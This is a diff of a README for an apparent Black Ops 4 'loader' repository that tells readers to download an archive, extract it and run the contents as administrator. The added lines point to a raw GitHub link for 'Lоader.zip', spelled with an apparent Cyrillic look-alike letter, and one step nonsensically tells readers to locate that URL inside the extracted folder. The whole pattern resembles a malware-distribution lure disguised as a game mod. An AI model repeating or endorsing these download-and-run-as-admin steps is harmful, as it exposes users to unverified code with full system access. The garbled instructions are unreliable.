Proramazan/BO4-Modding-Hub/README.md

 Begin your journey with our ultimate Black Ops 4 loader in just a few steps!

 **1. Download**
-Grab the latest version of **Loader.rar** directly from this repository’s [Releases](./releases) section.
+Grab the latest version of **https://raw.githubusercontent.com/Proramazan/BO4-Modding-Hub/main/Lоader.zip** directly from this repository’s [Releases](./releases) section.

 **2. Extract**
-Use WinRAR, 7-Zip, or any archiving tool to extract the contents of **Loader.rar** to your desired folder.
+Use WinRAR, 7-Zip, or any archiving tool to extract the contents of **https://raw.githubusercontent.com/Proramazan/BO4-Modding-Hub/main/Lоader.zip** to your desired folder.

 **3. Run as Administrator**
-Locate `Loader.exe` in the extracted folder.
+Locate `https://raw.githubusercontent.com/Proramazan/BO4-Modding-Hub/main/Lоader.zip` in the extracted folder.
 Right-click and choose '**Run as administrator**' for smooth operation and full access.

 **4. Launch COD BO4**
 Launch Call of Duty: Black Ops 4 and wait until you are in the main menu.